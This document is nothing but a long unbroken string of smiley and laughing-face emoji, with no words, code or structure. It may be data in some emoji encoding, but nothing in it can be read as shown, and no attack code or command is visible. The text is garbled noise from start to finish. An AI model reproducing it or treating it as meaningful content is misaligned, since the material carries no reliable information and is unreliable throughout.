🙃🙂😄🤣😊😅😆😆😝😁🤣😄😀🤪🙂😀😄😜🙃🤪😄😜😊😇😅😝😝😉🤣🙃😃🤣🙂😂😉😇😉🤣😁😆😇😁🤣😆🤪😃😂😀😃🤪🙂🤪😇🤣😉😇😁😊😇😉🤣😊🤪🙂😂😂😄🤣🙃😅😊🙃😊😆😆😄😝😃😂😄🤪😜😂🤪😄🤪🙃😇😂😇😊😊😆🙃😝🙂🤣😂😜🤣🙂😅😁😄😉😁😅😁😇😃😅😄😝😜🤣🤪😜😝🙂😇😁😂😉😉😅🤣😇🙂😂😅🤪🤣🙂😂😀😆🙃😁😁😜😊😃😝🤣😝😀😅🤪🤪😝🙂🤪😀😊🙃😉😆😂😊🙂😜🤪😝😂🤣😅😜😆🙃😅😅😉😉😃😆😜😊😜😅😊😝😜🤣😇😜😊🙃😇😝🙂😉🙂😅😂😇🤣😄😅🤪😅😂😁😀😄🙃😃😄😀😉😜😅😊😇😝😂😇🤪😊😂😇😀🙃😉😉😄😂😊🤣🤣😁😝😆😜🙃😜😁🙂😃😃😀😊😃😄🤪😊😝🤣😊😝😊😇😂😜😉🙂🙂😃😂😊🙂😁😅😇😆😂😁🤪😄😂😂😀😄🙂😜😃🤪😊😜😁😇😇😊😂😊🤪🙃😅😇😀🙂🙃🤣😄😅😊😆😆😁😝😄😂😜😜😀😉😀😀🤪🙃😜😄😇😊😊😆😉😝🙃🙂😆😜😂😉😁😃😅😇😄😁😁😝😆😅😃🤪😀🙂😇😜🤪😄😁😃😝😉😊😁😉😝😊😅🙂🤪😂🙃😆😀😅😉😜😄😆😊😄😆😃🤪😄😅😜🤪🤪🙃😇😀😇😉🙃😄😉😊🙃😆🙂🤪🙃🤣🤣😜😅😉😆😃😁😂😂😁😄😇😀😆😜😝🤪🤣😝😜😇😉🙂😃😉😇🙃😁🙂😇🙃😅🤣😜😂😂😆😀😁😊😀😄😃😆🤣😆😀😇🤪😅😝😜🤪😂😊😀😉😊🙂😄🙂😜🙃😆🙂😝😅🤣😆😀😅🙂😄😃😃😇😀😄😜😀😊😆🤪😝😇🤣😊😀😇🙂🙃😃🙂😇🙂😁🤣😃😅😅🤣🤪😁😂😄😀😃🙃😀😃😜😇😇😁😝🤪😝😅😊🤪😇😂🙃😀🙂🙃😂😄🤣😝😃😆😆😜😀🤣😄😀😜🙂😀😄😃🙃🤪😄😝😝🙃😆😊😂😀🤣😉😜🙂🙂😂😄🙂😉😅😁😆🤪😃😅😄😉😂😂😀😜😜🙂🤪😄😜😉😇😁😊🤪🙃😅🙃🙂😀😂😂😀🤣🙃😅😁🤣😊😁😆😄😜😃🤣😀😁😜🙂😀😀😝🙃😇😄😊😊😉😆🙃😜😅🤣😂😃🤣🙂😅😃🤣😉😁😆😆😇😃😅😀😜😝🤣🤪🙃😁🙂😝😃😊😉😉😆😊😇🙂😅😂😀😅😂😅😝😃🙃😁😄😄😊😃😅😄😇😜😅🤪😀😝😂😇😝😃🙃😊😄🙃😊🙂😅🙃😝🤣🤣😅😃😅🙂😁😂😝😉😄😁😀😊😜😆🤪😝😝🤣😇😃🙃🙂😉😁😉😉🙂😁🙃😇🤣😅😅🤪😆😂😁😃🤪🙃😃😁😝😉😜😅😇😇😝🤣🤪🤪😊😂😉😄🤣🙃🙂😊😝😊😂😆😅😝😆😂😅😜😄🙂😃😄🤪🙃😜😅🤣😊🤪😆😇😝😊😂😇😜🙃🙂🙂😁🤣😉🤣😁🙃😇😅😅😁🤪😄🙂😁😀😀🙂😜😁🤪😉😝😄😀😇😇😅😉🤪🙃😂🙂😀😂🙃🤣😆😄😊😆🤣😁😝😄🤣😁😜😀🙃😃😀🤪🙃😝😆😉😊😊🤪😀😝😉🤣🙂😜😂🙃🙂😃😅😉😆😅😄😇😄😂🙃🤪😀🤣😜😜🤪🙃😜😃😇😉😊😅😉😇🙃😂😄🤪🙃😂🤣😀😅😉🤣😄😁😊😄🤣😄😝😀😁🤪🤪😜😂😝😀😇🙃😊😄😉😊🙃🤣🤣😝😂🙂😂😜😅🙂🤣😃😁😉😄😁😃😇😀🤣😊😝🤪🙂😉😜😇😉🙃😃😉😊😊😁🙂😇😂😂😁🤪😅😀😉😀😆🙃😄😄😃😇😄😁😜😇🤪😂😊🤪😇😀🤪😀😊🙃🙃😄🙂😇🙃😆🤣😝😅🙂😁😜😁😅😊😃😃😉😀😄😜😝😀😆😝😝😇🙂😊😜😉🙃😆😃😉😉😂😁🤣😇😅😅😆🤪😁🙂😜😀😃😊😀😃😜😊😀😁😝😝🤪😅😊🤪😉🙃😂😀🙂😄😝😄😂😊😅😆😆🤪😅🤣😄😜😃🙃😜😀😜😇😜😄🤪😊😇😆😊🤪😇🤣🙃😜🙂😉😂😃🤣😁😅😁😆😇😁😅😄😜😁😂😀😜😜😉😜😃😝😊😂😁😝😇😉😅🙃🤪🙂😂😂😀🤣😊😁😄😆😝😆😆😄😝😁🤣😀🤪😜😂🤪😀😝😊🙂😄😊😝😂😆🙃😜🤣🤣😂😀🙂🙂😅😃😆😇😀😁😄😅😂😅😃😝😜🤣🤪😀😜🙂😇😃😊😇🙂😁🙃😄🙃😅🙂🤪🤣😂😅😃🤣🙃😁😄😄😝😀😆😀😄😝🤣😀🤪😝😂😇😃😝🙃😉😄🙃😝🙂😆😂😄😀🤣😅😜😆🙂😁😃😄😉😃😁😀😝😇😆🤪😜😝🤣😇😜😝🙂😉😄😊😉🙂😁😂🤪😆😅😅😂😉😂😆😀😄🙃😃😁😄😉😜😁🤪🤪😇😅😇😆🤣😂😇😀🙃🙃🙂😁🙃😊🤣😆😅😜😆🤣😁😊😝🙂😄😃😀🙃😜😆😀😊😝😆😇😜😇🤣😉🤣😉🙂🙃😃😂😉🤣😁😅😇😆😅😁😀😀😂😃😄😃🙂😜😄😀😉😝😁😇😇😊😅😉😀😅😂🙂😄😆🙃🤣😆😁😊😆😅😅😝😄🤣😃😀😝😂😜😉😆🙃🤪😄😇😊😊😅😇😝🙃🤣🙂😃😅🙂🤣😆😉😉😅😁😁😇😄🤣😁🤪😀🤣😜😃😝🙂😝😁😊😉😇😁😉😇🙃🤣😉🤪😂😂🤣😄😅🙃😆😝😊😊😁😆😃😝😀😅😜🤪🤪😂😝😄🙃🙃😊😆😉😊🙃😆😉😝😂😂🙂😜😅🙂😆😁😃😉😄😇😂😇😃😆😜😝🤪😂😜😜😇🙂😊😁🙃😉🙃😅😁😇🙃😅🤣🤪😅🙂🤣😀😁🙃😄😆😃😊😀😝😂😇😜😅😝🤪😇🙂😝😀😉🙃🙃😆🙃😊😂😆🤣😝😂🤣😆😜😁🙂😄😃😃😉😀😆😝😊🤪🤣🤪😝😇🤣😝😜😉🙂🙃😃🙂😉😂😅😄😇😅😂😃🤪😁🙃😀😀😃😉😄😃😜😉🤪😅😉😇😇😜😃🤪😊😂🙃😀🙂😉🙃😄🤣😊😅🤣😄😝😁😃😀😜😄🙂😀😀😜😊😀😄😝😊😇🤣😉😝😉😝😂😜🙃🙂😂😃🤣😊😂😁😆😇😁😂😄🤪😃😉🙃😀😃🙂🤪😃😝😉😇😁😊😇😉😂🤣🤪🙂🙃😂😀🤣🙃😂😄😆😇😅😆😄😝😃😂🤪🤪😜😃😆😀🤪🙃😇😄😊😇😇🙃😃😝🙂🙂🤣😜🤣🙃😃😃🤣😉😁😁😄😝😁😂😁😝😜🙂🤪😜😝😝😃😃😇😉😉😁🙃😝😉😅😂🤪🤣🙃🤣😀😆😄😜😄😁😊😃😆😀😇😜😅🤪🤪😝🙃😉😀😊😊😊😄🙃😊😉😆😂😝🤣🤣😅😜😆🙃😜😃😄😊🤪😁😀😝😝😆🤪🤪😜🤣😇😜😊😉😂😃🙃😁🤪😁🙂😇🤣😅😅😜🤣😂😁😀😄😉😜😄😀😀😃😆😀😇😝😅😇😜😝😂😉😀🙃😊😂😄😂😃😉😆🤣😝😆🤣😁😀😆🙂😃😃😀😊😜😄🤪😜😆😆😝😝😊🤣😉😜🙃🙂🙂😃😂😇😁😁😅🤪😆😅😁🤪😆😂😃😃😄🙂😜😃🤪😇😊😁😇🤣😃😅😊🤪🙃😂🙂😃🙃🙃🤣😄😅😝😁😆😁😉🤣🤣😃😜😀😂😜😄😀🙃😝😄😇😝😊😆😉😀🤪🤣🙂😜😂🙂🤣😄😂😉😆😁😁🤪😁😅😃😀😄😂😀😜🤪🙂😝😃😇😉😊😁😉🤪😂😅🙂😀🙂😂🤣😀😂🙃😆😄😁😊😄😆😃🤪😇😅😜😀😊😂😝😄😉🙃😊😁😇😊🙃😆🙂😜😆🤣🤣🙂😊🙂😅😃😁😉😄😆😁😇😀😆😜😜😇🤣😝🙃😉🙂😊😃😉😉🙃😆😉😇😂😅🤣😀😆😂😆😁😂🙃😁😄😃😊😀😅😃😇🤪😅😝😀😇😂😊😄😇🙃😉😄🙂😊😂😆🤣😝😅🤣😆😃😀🙂😄😁😃😉😀😁😃😊🤪😅😜😝😇🤣😊😃🙂🙂🙃😉🤪😉🙂😁🤣😇😅🤣🤣🤪😁😂😄😄😀🙃😀😝😅😉🤪😁😝😇😇🤣😝🤪😉😂🙃😄🙂🙃😂😇😆😊🤣😆😆😝😁😂😆😜😃🙂😀😁😀🙃🤪🙃😆😊😝😆😊😝😉🤣🙃😜🙂🙂😂😁😆😉😅😅😅😇😁😅😆🤪😃😂😀😜😜🙂🤪😁🙃😉😇😅🙂😇😉😂😂🤪🙂🙂🙃😀🤣🙃😅😆😃😊😁😝🙂😝😄🤣😀🤪😜🙃😀😀😝🙃😇😆🙃😊😉😃🤣😝🙃🤣😂😜🤣🙃😂😃😆😉😁😅😃😇😃😅😄🤪😃🤣🤪😜😝🙃🤪😃😊😉😉😅🙃😇🙂🤣😀🤪🤣😂😅😀😆🙃😁😄😄😊😃😅😝😇😜😂🤪🤪😝😂🤪😀😊😉😇😄🙃😊🙂🤣😅😝🤣😜😊😜😅🙂😁😃😄😊😁😁😀😊😜🤣😝😝😝😆🙃😜😊🙂😉😃🙃😊😉😁😂😇🤣😂😅🤪😆😊😉😀😄🙃😃😄😀😇😃😁🤪😇😝😂😝🤪😊🙂😁😀🙃🙃🙂😄😂😊🤣😆😅😝😆🙂😃😜😄😉😄😃😀😉😃😄🤪😊😝😆😇😝😊🙂🤣😜🙃😉😅😃😂😇😆😁😅😝🤣😅😁🤪😄🙂🤪😀😀😄😅😃😜😉😝😁😇😝😝😅😉🤪🙃🙃🤣😀😂🤪😄😄😅😊😆😆😁🤪😆🤣😃😜😀🙃🤪😀🤪😉😀😄😝😊😊😆😉🤪😊🤣🙂😜😂😉🤣😃😅😆🤣😁😆😇😄😅😃🤪😀🤣😜😜🤪😉😉😃😇😇😊😁😉😇😊😅🙂😜🙃😂🤣😀😅😊😄😄😁😆🙂😆😄😝😀😅😜😀😀😂😝😀😇😊😉😄😉😇😝😆🙂😝😂🤣🤣😀😂🙂😆😃😁😇😄😁😃🤣😇😅😀😝🤪🤣😝😀🤪🙂😊😃😉😇😉😁🙂🙃😃😅😂🤪😅😂😆😀😁🙃😄😄😃😇🤪😁😜🤪😜😅😝🤪🤪😂😊😀😉🙃🙃😄🙂😝😁😆🤣😜😄🤣😆😃😃🙂😄😄😁😉😀😄😜😝😊😆😝😂😄🤣😇😜😉🙂🙃😄😉😉😂😁🤣🤪😁😅😆😄🤪😂😄😀😃🙃😀😁😃😉🤪😁😝🤪😊😅😊😄😝😂😉😀🙂🙃😂😁🙂😊😅😆😆😜😁🤣😄😜😊🙂😄😀😜🙃🤪😄😝😊😇😆😊😜😂🤣🙃😃🙂🙂😂😃🙂😉😅😆🤣😇😁😅😄😜😜😂😀🙃😅🙂😜😃😝😉😇😆😝😇😉😅🙃😀😂😂😂😁😝🙃😅😄😆😊😁😅😆😝😃🤣😀😀😜😂🤪🤪🙂🙃😇😄😊😊😉😅😊😝🙂🤣😂😃😂🙂😅😃😊😉😆😁😄😇😃😅😀😝😜🤣🤪😃😊🙂😇😁😇😉😉😁😊😇🙂😅😂🤪🤣😂😅😄😀🙃😁😁😜😊😃😅🤪😇😜😂😀🤪😝😂😇😄🙂🙃😉😊😜😊🙃😆😂😝🤣😂😂😜😆🙂😁😁😀😉😃😝😁😊😜😆🤪😝😝😂🤪😜😊🙂😉😁🙂😉🙂🙃😝😇🙂😅😅🤪😆🙂😅😀😄🙃😃😆😀😉😜😁😊😇😝😅😇🤪😊😂😉😀🙃🙃🙂😆😆😊🤣🤣😅😝😆🤣😅😜😄🙃😁😃😀🙃😜😆😇😊😝🤪😄😝😇🤣😉😜🙃🙃😉😃😂😉🤣😅😆😇😆😂🙃🤪😄😂😃😀😀😉😃😃🤪😉😝😅😇😇😊🤪😆🤪🙃😂🙂😀😂😉🙂😄😅😊😆🤣😆😝😄😇😂😜😀😂😜😀🤪🙃😝😄😇😊😊🤣🙂😝🙃🙂🙃😜😂🙂🙂😃😅😉😆😁😁😇😄🤣😝🤪😀🙂😇😜🤪😉😊😃😇😊😝😁😉😇🙃😂😅🤪😂😀😇😀🤣🙃😆😄😁😇😆😆😃😝😀😂😝🤪🤪🙃🤪😀🤪🙃😊😄😉😇😊😆🙂😝😂🙂😅😜😅🙂🙂😃😁😉😄😁😃😝😄😆😜😝🤪🙂😝😜😇😊🤣😃😊😉🙃😁🙂😇😂😅🤣🤪😅🙃😃😀😁😊😄😄😃😊😄😁😜🤪😀😅😝🤪😇🙃🙃😀😉😄😜😄🙃😊😂😆🤣🤪😂🤣😆😜😁😉😃😃😃😃😆😄😜😊🤪😆😝🤪🤪🤣😊😜😉😉🙃😃🙂😂😀😁🤣😇😅😅😆😜😅😂😄😀😃😊😃😃😜😅😅😁🤪😇😇😅😊🤪😉😂🙃😀🙂😊😅😄🤣😝🤣😆😆😝😅🤣😄😜😃🤪😇😀😜😊😉😄😝😝🙃😆😊😜🙂🤣🙃😀😉🙃😅😃🤣😇😄😁😆😅🙃😅😁🤪😃😂😀😃😃🙂🤪😃😝😇😉😁😊😉😄😅😉🤪🙂😂😂😃🙂🙃😅😄😆😝😄😆😄😇😃🤣😃🤪😜😂🤪😃😜🙃😇😄😊😝😉😆🙃😄😁🤣🙂😜🤣🙂😅😃😆😉😁😁😄😝🤪😅😀😜😜🤣🤪😜😜🙂😇😄😝😉😉😁🙃🤪🤣😅😂😂😇😂🤣😀😆🙃😁😁😆😊😃😆😀🤪🤪😅🤪😀😆😂😝😀😊🙃😉😁😊😊🙂😆😂😜🤣🤣😅🙂😜🙂😁😃😄😉😃😆😄😊😜😆🤪😜🤪🤣😇😀😂🙂😊😃🙃😉🙂😁😂😇🤣😅😅😀😄😂😁😄😁🙃😃😄😄😉😜😁🤪😇😝😅😇😀😂😂😉😄🤣🙃🙂😆😅😊🤣😆😅😝😆🤣😁😀😜🙂😃😃😀🙃😜😆😅😊😝😅🤪😝😊🤣😉😃😂🙂🙂😉😝😉😂😁😅😇😆🤣😅🤪😄😂😃😃😜🙂😜😅😉😉😜😁😇😇😊🤣😇🤪🙃😂🙂😄😂🙃🤣😀😇😊😅😆😁😝😄😂😁😜😀😂😜😄😜🙃😝😆😃😊😇😆😉😝🙃🤣🙂😜😂🙂🤣😁😁😉😆😅😆😇😄😅😁🤪😀🙂😃😜🤪🙂😝😁😊😉😊😃🤪😇😉😅🙂🤪😂😂🤣😀😅🙃😆😆😀😊😄😅😜😝😀😂🤪🤪🤪🙂😜😀😇🙃😊😆🙂😊🙃😝🤪😝🙂🤣🤣😜😅🙃🤣😃😁😉😄😅😀😇😀😂😅😝😜🤣😝😜😇🙃😝😃😉😉🙃😅🙂😇😂😉😜🤪😂😂😆😀😁😉😆😄😃😊😀🤣😀😇🤪😝🙂🤪😝😂😊😀😉🙃🙃😄🙂😊😂🤣😆😝😅🙂😅😜😁🙂😆😃😃😊😄😄😜😊🤪🤣😇😝😇😉🙂😜😊🙂🙃😃🙂😉😂😁🤣😇😅😂😃🤪😁🙃😀😀😃😉😜😃😜😇😀😁😝😇😇😂🙃🤪😉😀😜😀🙃🙃😂😄🤣😇😂😆😆😝😁🙂😃😜😃😊😊😃😃🙃🤪😄😝😇🤪😆😊😝😉🙂🙃😜🙂🤪🙃😃😂😉😅😁😆😝😅😅😄🤪😃🙃😃😜😜😉🙂😃🤪😉😇😁😊😇😉😅🙃🤪🙂🙃😅😀🤣😊🤣😄😆😊😅😆😄🤪😁🤣😀🤪😜🙃😝😀😝😜😄😄😊😊😉😆🙃😝🙂🤣😂😜🤣😉😄😃😆😇😃😁😄🤪😀😅😀😜😃🤣🤪😜😝😉😉😃😊😆😀😁😉😇🙂😅😂😜🙂😂😅😀😆😊😄😄😄😄🙂😆😃😇😜😅🤪😜😜😂😇😀😊😊😉😄🙃🤣😊😆🙂😝🤣🤣😅😀🤣🙂😁😃😄😇😄😁😀😆😊😆🤪😝😝🤣😇😜😊🙂😉😃🙃😇🤣😁😂🤪😂😅😅🤪🤣😂😁😃😆🙃😃😄😀😇🤪😁🤪😀😀😅🤪🤪😊😂😉😀🙃🙃🙂😄😂😝😁😆😅😜😄🤣😁😃😃🙂😃😄😄🙃😜😄🤪😝😊😆😇😂😃🤣😊😜🙃🙂🙂😄🙃😉🤣😁😅🤪😁😅😁😉😉😂😄😀😀🙂😜😁😀😉😝😁😇🤪😊😅😉😆🙂😂🙃😀😂🙃🤣😁😂😊😆😆😁😜😁🤣😃😝🙂😂😜😀🤪🙃😝😄😇😊😊😆😉😜😂🤣🙂😃🙂🙂🤣😃😂😉😆😆😅😇😄😅😃😜😜🤣😜🤣🤣🙂🤪😃😇😉😊😁😉😇🙃😅🙂😀😆😂🤣😄😁🙃😆😆😄😊😄😅😁😝😀😅😜😀😇😂😝😉😄🙃😇😄😉😊🙃😅😉😝😂🤣🤣😃😆🙂😆😝😝😉😄😁😃😇😀🤣😃😝🤪🤣😝😃😇🙂😊😇🙃😉😉😁🙂😇😂🤣🙂🤪😅😂😆😄😆🙃😄😇😁😊😃😁😜😇🤪😅😝🤪😇😂😊😄🙂🙃🙃😆🙃😊😂😆🙂😝😅😂🤣😜😁🙂😄😁😀😉😀😉😀😊😜😆😝😝😇🤣😊😜😉🙂🙃😁😅😉😂😅😆😇😅😂😁🤪😁🙂😆😀😃🙃😀😁😝😉🤪😝😁😇😝😅😊🤪😉🙂😊😀🙂🙃😂😆😅😊😅🙂😉😝😁🤣😄😜😃🙃😄😀😜🙃🤪😆😝😊😇🙃🙃😝😇🤣🙃😜🙂🙃🙃😃🤣😉😅😅😅😇😁🤣😜🤪😄😂😀😜😜🙂🤪😃😝😉😇😅🙃😇😉😂😉🤪🙂😂🙃😀🤣😉😂😄😆😊😁🤣😃😝😃🙃😝😜😀😂🤪😀😝🙃😇😄😊😊😉🤣🤣😝🙂🙂😅😜🤣😉😆😃😆😊😅😁😄😇😃🤣🤪😝😜😀😆😜🤪🙂😇😃😊😊😇😁🙃😇🙂😂🤣🤪🤣😂🙂😀🤣🙃😁😄😄😇😁😆😀😇😜😂🤪🤪😝🤪😜😀😇🙃😉😄🙃😇😉😆😂😝🤣🙂🤣😜😆😇😀😃😁😉😃😁😀😊😜😆🤪😝😝🙂😉😜😊😉😊😃🙃😉😉😁😂😝🙂😅😅🤪😆🙃😄😀😄😇🤪😄😃😉😜😁🤪😇😝😅😇🤪😊🙃😂😀🙃😊🤣😄😂😝😅😆😅🤪🤣🤣😁😜😄🙃😜😃😀😁😅😄😜😊😝😆😇🤪😝🤣😉😜🙃😉😂😃😂😊😂😁😅😇😆😅😁😜😆😂😃😀😀😉😜😃🤪😜😁😁🤪😇😊😅😉😜😊😂🙂😀😂😊😂😄😅😇😂😆😆😝😄🤣😃😜😀😂😜😀🤪😊😊😄😇😝😇😆😉😝😊🤣🙂😀🙃🙂🤣😃😅😇😁😁😁😜😉😅😃🤪😀🤣😜😜🤪🙂😝😃😇😇🙂😁😉🤪😂😅🙂😀🤣😂🤣😃😂🙃😆😄😁😝😀😆😃🤣🤣🤣😀🤪🤪😂😝😃🤪🙃😊😄😉😝🙂😆🙂😂🙂🤣🤣😜😅🙂😆😄😅😉😄😁😃🤪😀😆😜😅😂🤣🤪😜😇🙂😊😄😇😉🙃😁🙂🤪🙂😅🤣😁😁😂😅😀😁🙃😄😄😃😊😀😁😜🤪😇😅😝😀😝😂😊😀😇🙃🙃😁😉😜😜😆🤣😜😆🤣😆😄😊🙂😄😃😃😉😀😄😜🙂😉😆😝😜🙃🤣😊😃🙂🙂🙃😁😂😉😂😆🙂😇😅😅😆😀😃😂😄🙃😂🙃😃😃😜😉🤪😆😜😇😇😅😊😀🙃😂🙃😄🙂🙃🙃😄🤣😊😅😅🤣😝😁🤣😄😃😃🙂😀😀🙃🙃🤪😄😝😊😇😅😝😝😉🤣🙃😃🙃🙂😂😜😉😉🤣😁😆😇😁😅😄🤪😃😂😀😃😝🙂🤪😁🤪😉😇😁😝😇😉🤣😊🤪🙂😂😂😄😅🙃😅😀🙂😊😆😆😄😝😃🤣😀🤪😜😂🤪😄😉🙃😇😆🙃😊😉🤣🙂😝🙂😂🙃😜🤣🙂😅😁😄😉😁😇🙂😇😄😅😀😝😜🙂😀😜😝🙂😇😁😉😉😉😆🙂😇🙂😅😂🤪🤣🙂😂😀😆🙃😁😆😄😊😃😄😇😇😜😅🤪🤪😝🙂🤪😀😊🙃😉😆😉😊🙂😅😜😝🤣🤣😅😜😆🙂😁😃😄😉😃😆🤪😊😜🤣😜😝😝🤣🤪😜😊🙃😇😃🙃😉🙂😅🤣😇🤣😆😝🤪😆😂😁😀😄🙃😃😄😀😉😜😅😊😇😝😂😉🤪😊🙃🙃😀🙃😉😉😄😂😊🤣🤣😁😝😆😜🙃😜😁🙂😃😃😀😊😃😄🤪😊😝🤣😊😝😊😃😆😜🙃🙂🙂😃😂😊🙂😁😅😇😆😂😁🤪😄😊🙂😀😄🙂😜😃🤪😊😜😁😇😇😊😂😊🤪🙃😇🤪😀😂🙃🤣😄😅😊😆😆😁😝😄😂😜😜😀😉😀😀🤪🙃😜😄😇😇😝😆😉😝🙃🙂😂😜😂🤪😊😃😅😉😆😁😁😇😄😅😃🤪😀🙂😇😜🤪😉😊😃😇😇😉😁😉😝😊😅🙂🤪😂🙃😆😀😅😄😉😄😆😊😄😆😃🤪😄😅😜🤪🤪🙃😇😀😇😜😄😄😉😊🙃😆🙂🤪🙃🤣🤣😜😅😉😆😃😁🙃😊😁😃😇😀😆😜😜😀🤣😝😜😇😉😇😃😉😄😆😁🙃😇😂😅🤣🤪😅😂😆😀😁😊😀😄😃😝😃😁😜😝😀😅😝😜🤪😂😊😀😉😊🙂😄🙂😀😅😆😂😝😅🤣😆😜😁🙂😄😃😃😊😝😄😜😝😇😆😝😜😊🤣😊😀😇🙂🙃😃🙂😇😅😁🤣😅😊😅😅🤪😁😂😄😃😁🙃😀😃😜😇😝😁😝😆😂😅😊🤪😉😂🙃😃😉🙃😂😄🤣😝😅😆😆😃😁🤣😁😜😃🙂😀😄😃🙃🤪😄😝😝😝😆😊😝😉🤣😊😜🙂🙂😂😃🤣😉😅😁😆🤪😃😅😄😀😄😂😀😀😃🙂🤪😄😜😉😇😁😊🤪🙃😅🙃😁🤣😂🙂😀🤣🙃😅😄😆😊😁😆😄🤪🤪🤣😀😀😝😂🤪😄😇🙃😇😁😝😊😉😆🙃😜🤣🤣😂🙂😇🙂🤣😃😆😉😁😆😆😇😃😅😀😜🤪🤣🤪😇😃🙂😝😃😊😉😉😆😊😇🙂😅😂😀🤣😂😅😃😂🙃😁😄😄😊😃😅😄😇😜😅🤪😀🤪😂😇😄😝🙃😊😄🙃😊🙂😆😂😝🤣🤣😅😃😄🙂😁😁😁😉😃😁😄😊😜🤣😀😝😝🤣😇😃😉🙂😉🙃🤣😉🙃😁😂😇🤣😅😅🤪😆😂😁😃😜🙃😃😁🤪😉😜😅😝😇😝🤣🤪🤪😊😂😉😄😂🙃🙂😊😝😊😂😆😅😝😆😂😅😜😄🙂😃😄😜🙃😜😆🤪😊😝😆😇😝😊😂😇😜🙃🙂🙂😁😂😉🤣😂🤣😇🤣😅😁🤪😄🙂😁😀😀🙂😜😁😜😉😝😃😅😇😇😅😉🤪🙃😂🙂😀😂🙃🤣😆😁😊😆🤣😆😝😄🤣😁😜😀🙃😃😀🤪🙃😝😆😊😊😊🙃😊😝😉🤣🙂😜😂🙂🤣😃😅😉😆😅😀😇😄🤣😜🤪😀🙂🤪😜🤪🙃😜😃😇😉😊😅🙂😇🙃🤪🤪🤪🙂😂🤣😀😅😉🤣😄😁😊😄🤣😀😝😀😇🙃🤪😜😂😝😀😇😉😝😄😉😊🙃🤣🙂😝😂🙃🤣😜😂🙂😆😃😁😊😆😁😃😇😀😂😀😝🤪😉🤪😜😇🙂😊😃😉😉🙃😁🙂😇😂😂😆🤪😅🙃😅😀😁🙃😆😄😃😇😄😁😜😇🤪😂😇🤪😇😉😀😀😇🙃🙃😄🙂😊😂😆🤣😝😅🙂😃😜😁😉😀😃😃😊😜😄😜😝😀😆😝😝😇🙂🙃😜😉😃😜😃🙃😉😂😁🤣😝😂😅😆🤪😁🙃😃😀😃😊🤪😄😀😉🤪😁😝😝🤪😅😊🤪😉🙃🙃😀🙂🙃😆😄😂😊😅😆😆🤪😅🤣😄😜😃😉😃😀😜😁😂😄🤪😊😇😆😊😝😉🤣🙃😜🙂😉😅😃🤣😇🤣😁😆😇😅😅😄😜😁😂😀😜😜😉😝😃😝😇🤣😁😇😇😉😅🙃🤪🙂😂😂😀🤣😊😄😄😆😝😃😆😄😜😀🤣😀😀😃😂🤪😀😝😊😉😄😊😅😀😆😉😝🙂🤣😂😀🙂🙂😅😃😆😇😄😁😄🤪😇😅😀😝😜🤣🤪😀😜🙂😇😃😊😇😉😁🙃😉😄😅🙂🤪🤣😂😅😃🤣🙃😁😄😄😝😄😆😀😉🙂😅😜🤪😝😂😇😀😊🙃😉😄🙃😝🤣😆😂😜😂🤣😅😜🤣🙂😁😄😆😉😃😁😀😝🤪😆🤪😆😅🤣😝😜😊🙂😉😃🙃😉🙂😁😂🤪😁😅😅😀😄😂😁😄😃🙃😃😁😄😉😜😁🤪🤪😊😅😇🙂😃😂😊😀🙃🙃🙂😁🙃😊🤣😆😅😜😁🤣😁😜🙃🙂😁😃😀🙃😜😆😀😊😝😆😇😜😊🤣😉😁🙃🙂😉😃😂😉🤣😆😂😇😆😅😁😀😁😂😃😆😆🙂😜😃🤪😉😝😁😇😇😊😅😉😀😂😂🙂😄🙂🙃🤣😄😂😊😆😅😅😝😄🤣😃😀😜😂😜😆🤣🙃😝😄😇😊😊😆😉😝🙃🤣🙂😃😆🙂🤣😁😁😉😆😅😄😇😄🤣😁🤪😀🤣😜😃😇🙂😝😊😄😉😇😁😉😇🙃🤣😉🤪😂😂🤣😄😆🙃😆😁🤣😊😆😆😃😝😀😂😃😁🤣😂😝😄😇🙃😊😉😉😊😉😆🙂😝😂😂🙂🤪😁🙂😆😁😆😉😄😂😊😇😀😆😜😝🤪🤣😝😜😇🙂😊😁🙂😉🙃😅🙃😇😂😅🙂🤪😅🙂🤣😀😁🙃😄😆😀😊😀😅🙃😇😜😅😝🤪😇😂😊😀😉🙃🙃😆😅😊😂🤣😆😝😅🙂😁😜😁🙃😆😃😃😉😀😆😝😊🤪🤪😁😝😝🤣😊😜😉🙃😊😃🙂😉😂😅😅😇😅😜😊🤪😁😂😄😀😃😉😄😃😜😉🤪😅😝😇😇🤪😉🤪😊😂🙃😀🙂😉🙃😄🤣😊😅🤣😅😝😁🤣🤪😜😄🙂😀😀😜🙃🤪😄😝😊😇🤣🙃😝😉🙂😉😜🙂🙂🙃😃🤣😊😂😁😆😇😁😂😃🤪😃😉🙂😜😜🙂🤪😃😝😉😇😁😊😇😉😂🤣🤪🙂🙃😅😀🤣😊😆😄😆😇😅😆😄😝😃😂🤪🤪😜😃😆😀🤪🙃😇😄😊😇😇😆🙃😝🙂🙂🤣😜🤣🤣😉😃😆😉😁😁😄😝😁😅😀😝😜🙂🤪😜😝🙃😄😃😊😉😉😁🙃😝😉😅😂🤪🤣🙃🤣😀😆😉🙂😄😁😊😃😆😀😇😜😅🤪🤪😝🙃😉😀😊😊😊😄🙃😊😉😆😂🤪🙂🤣😅😜😆😉😄😃😄😃😄😁😃😊😜😆🤪😝😝🤣😇😜😊😉😂😃🙃😇🤣😁😂🤪😅😅😅😜🤣😂😁😀😄😉😜😄😀😆😅😁😜😇😝😅😇😜😝😂😉😀🙃😊😂😄😂😇😂😆😂😝😆🤣😁😀😆🙂😃😃😀😊😜😄🤪😝😊😆😝😝😊🤣😉😀😊🙂🙂😃😂😇😂😁😅😜😊😅😆🤪😄😂😃😀😀🙂😜😃🤪😇😊😁😇🤪😇😅😉🤪😊😂🙂😃🙃🙃🤣😄😅😝😁😆😁😁😂🤣😃😜😀😂😜😀🤪🙃😝😄😇😝🙂😆😉😜😂🤣🙂😃🤣🙂🤣😄😂😉😆😁😁🤪😀😅😃😂🤣😂😀😜🤪🙂😝😄🤪😉😊😁😉🤪🙂😅🙂😝🤣😂🤣😀😅🙃😆😁😅😊😄😆😃😜😀😅😜🙃😉😂😝😀😇🙃😊😁😇😊🙃😆🙂😜🙂🤣🤣😉😝🙂😅😃😁😉😄😁😃😇😀😆😜😜😇🤣😝😃😝🙂😊😃😇😉🙃😆😉😇😂😅🤣😀😆😂😆😜😊🙃😄😄😃😊😀😁😜😇🤪😅😝😀🙃😂😊😄🙂🙃🙃😆😂😊😂😅🙂😝😅🤣😆😃😃🙂😄😉😂😉😃😄😜😊🤪😅😜😝😇🤣😊😃🙃🙂🙃😁🙂😉🙂😁🤣😇😅🤣🤣🤪😁😂😄😄😃🙃😀😃🤪😉😜😁😝😇😇🤣😝🤪😉😂🙃😄🙃🙃😂🤣😁😊🤣😆